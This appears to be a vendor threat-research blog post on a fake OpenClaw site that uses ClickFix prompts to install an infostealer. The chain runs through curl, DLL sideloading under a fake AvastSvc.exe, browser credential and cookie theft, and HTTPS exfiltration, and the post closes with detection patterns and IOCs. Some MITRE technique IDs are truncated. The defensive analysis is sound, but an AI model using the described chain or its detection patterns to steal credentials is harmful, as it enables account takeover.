Blog

Threat Research

Fake OpenClaw AI Tool Used to Deliver Infostealer via ClickFix Attack Chain

Overview

This report analyzes a malware distribution campaign leveraging a spoofed OpenClaw platform to deliver an infostealer payload. The campaign relies on ClickFix-style social engineering to trick users into executing malicious commands manually, bypassing browser-based security controls.

Once executed, the payload initiates a staged infection chain involving a loader, a masqueraded executable, and a malicious DLL deployed via sideloading. The final payload focuses on browser credential harvesting and data exfiltration over HTTPS using WinHTTP APIs, enabling stealthy communication with attacker-controlled infrastructure.

Initial Access: ClickFix-Based Social Engineering

The campaign uses a typosquatted domain designed to impersonate the legitimate OpenClaw platform. The website closely mimics the original branding and user interface to establish trust.

ClickFix is a social engineering technique where users are instructed to manually execute commands, effectively bypassing browser-based download protections.

Figure 1: Spoofed OpenClaw website (app-clawbot[.]org) impersonating the legitimate platform to lure users into initiating the infection chain.
Figure 1: Spoofed OpenClaw website (app-clawbot[.]org) impersonating the legitimate platform to lure users into initiating the infection chain.

Instead of providing a standard installer, the site redirects users to a ClickFix-style interface that instructs them to manually execute a command via Command Prompt.

Figure 2: ClickFix-style instructions prompting users to manually execute a malicious command, bypassing browser-based security controls.
Figure 2: ClickFix-style instructions prompting users to manually execute a malicious command, bypassing browser-based security controls.

Execution Chain

The infection chain is initiated when the user executes the provided command via Command Prompt.

Execution occurs in the context of the logged-in user, with no evidence of privilege escalation observed during initial stages.

Figure 3: Malicious command leveraging curl to download and execute the payload from attacker-controlled infrastructure.

The command performs the following actions:

  • Downloads a payload using curl
  • Writes the file into %AppData%
  • Executes the payload immediately


User → ClickFix → cmd.exe → curl → Loader → AvastSvc.exe → aswCmnOS.dll → Browser Data → C2

Following execution, the malware proceeds through a staged deployment:

  1. Initial binary executes as a loader
  2. Loader drops:
    • AvastSvc.exe(masqueraded executable)
    • Multiple DLLs, including aswCmnOS.dll
  3. The executable triggers DLL sideloading
  4. The malicious DLL is loaded and executed

 

Execution Analysis: Process Tree

Process Tree: Revealing Malware Execution Flow
Figure 4: Process tree illustrating staged execution, including loader activity and subsequent launch of a masqueraded executable.
Figure 4: Process tree illustrating staged execution, including loader activity and subsequent launch of a masqueraded executable.

As shown above, the process tree highlights the transition from initial execution to payload activation, confirming a multi-stage infection model.

The absence of a legitimate parent application chain and execution from user-writable directories further reinforces that the observed activity is malicious and not part of standard software installation behavior.

Defense Evasion: DLL Sideloading and Masquerading

The malware abuses DLL sideloading by bundling a legitimate-looking executable with a malicious DLL in the same directory.

Figure 5: Dropped files demonstrating DLL sideloading, where a legitimate-looking executable loads a malicious DLL from the same directory.
Figure 5: Dropped files demonstrating DLL sideloading, where a legitimate-looking executable loads a malicious DLL from the same directory.

Due to Windows DLL search order behavior:

  • The executable loads the malicious DLL from the local directory
  • Execution occurs under the context of a trusted-looking binary

Additionally, the use of the filename AvastSvc.exe mimics legitimate security software, further reducing suspicion.

System Profiling

Before executing its primary functionality, the malware performs basic host identification.

It queries the following registry key:
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName

 

Figure 6: Registry query used for system identification, retrieving the host computer name.
Figure 6: Registry query used for system identification, retrieving the host computer name.

This behavior supports:

  • Victim identification
  • Campaign tracking
  • Environment awareness

No advanced sandbox evasion techniques were observed in the analyzed sample.

Payload Execution: Malicious DLL (aswCmnOS.dll)

The file aswCmnOS.dll acts as the primary payload and is loaded via DLL sideloading.

The DLL serves as the primary execution component, orchestrating credential harvesting and command-and-control communication:

  • Initializing runtime components
  • Loading or decrypting configuration data
  • Executing credential harvesting routines
  • Initiating communication with the command-and-control server

This modular architecture enhances evasion by separating execution stages and reducing observable indicators per component.

Static analysis of aswCmnOS.dll indicates that execution is initiated through standard DLL entry mechanisms, followed by initialization routines responsible for loading embedded configuration data. Observed API usage and string references suggest a staged execution model, where browser targeting and network communication components are initialized sequentially.

Targeted Data Collection: Browser Credential Theft

The malware includes logic to selectively target browser processes, ensuring focused data collection.

Figure 7: Decompiled function used to identify browser processes, enabling selective credential harvesting.
Figure 7: Decompiled function used to identify browser processes, enabling selective credential harvesting.

Based on this logic, the malware targets:

  • Chromium-based browsers (Chrome, Edge)
  • Mozilla Firefox

Data of interest includes:

  • Stored credentials (Login Data databases)
  • Cookies and session tokens
  • Browser profile data

Selective execution minimizes noise and increases efficiency in credential harvesting.

Data extraction likely targets SQLite-based browser storage files, including credential and cookie databases commonly used by Chromium-based browsers.

Command and Control (C2) Communication

The malware communicates with attacker-controlled infrastructure using WinHTTP APIs.

Figure 8: Use of WinHTTP APIs for HTTPS-based communication with command-and-control infrastructure.
Figure 8: Use of WinHTTP APIs for HTTPS-based communication with command-and-control infrastructure.

Observed APIs include:

  • WinHttpConnect
  • WinHttpOpenRequest
  • WinHttpSendRequest

These are used for:

  • Exfiltration of collected data
  • Beaconing to maintain connectivity
  • Potential tasking

The use of HTTPS (port 443) ensures encrypted communication, reducing visibility in network monitoring systems.

The use of WinHTTP enables the malware to blend with legitimate system traffic, reducing the likelihood of detection by security tools that rely on identifying anomalous networking libraries.

MITRE ATT&CK Mapping

The campaign aligns with the following techniques:

  • T1204– User Execution
  • T1036– Masquerading
  • 002– DLL Sideloading
  • T1005– Data from Local System
  • 001– Web Protocols

Mappings are limited to confirmed behaviors to maintain analytical accuracy.

Detection Opportunities

Process Behavior

  • Process chain: cmd.exe → curl.exe → %AppData%\*.exe
  • Suspicious parent-child relationships involving user-initiated command execution

File System Indicators

  • Executables and DLLs located in user directories
  • Presence of:
    • AvastSvc.exe outside expected installation paths
    • Co-located DLLs used for sideloading
  • Executables mimicking security software (e.g., AvastSvc.exe) outside standard installation directories

Defense Evasion Indicators

  • Unsigned DLLs loaded by legitimate-looking executables
  • Execution from non-standard directories

Registry Activity

  • Queries to system identification keys such as ComputerName

Network Indicators

  • WinHTTP-based outbound connections using default Windows networking behavior
  • Connections to newly registered or low-reputation domains

Behavioral Indicators

  • Access to browser credential stores
  • Cookie and session token extraction

Indicators of Compromise (IOCs)

  • Domain
    • app-clawbot[.]org
  • File Names
    • OpenClaw.exe
    • AvastSvc.exe
    • aswCmnOS.dll
  • File Path
    • %AppData%\

Conclusion

This campaign demonstrates a structured and effective infection chain combining social engineering and execution evasion techniques.

Key characteristics include:

  • User-driven execution via ClickFix
  • Staged payload deployment
  • DLL sideloading for stealth
  • Targeted browser credential harvesting
  • Encrypted C2 communication using native Windows APIs

The reliance on legitimate tools and user interaction reduces detection by traditional security controls, emphasizing the need for behavioral monitoring and endpoint visibility.

This campaign highlights the growing effectiveness of user-driven execution techniques in bypassing traditional security controls.

Contributors:

Siva Prasad Boddu

Siva Prasad Boddu

Pandurang Terkar

Pandurang Terkar

Rudra Pratap

Rudra Pratap

Advanced cyber security analytics platform visualizing real-time threat intelligence, network vulnerabilities, and data breach prevention metrics on an interactive dashboard for proactive risk management and incident response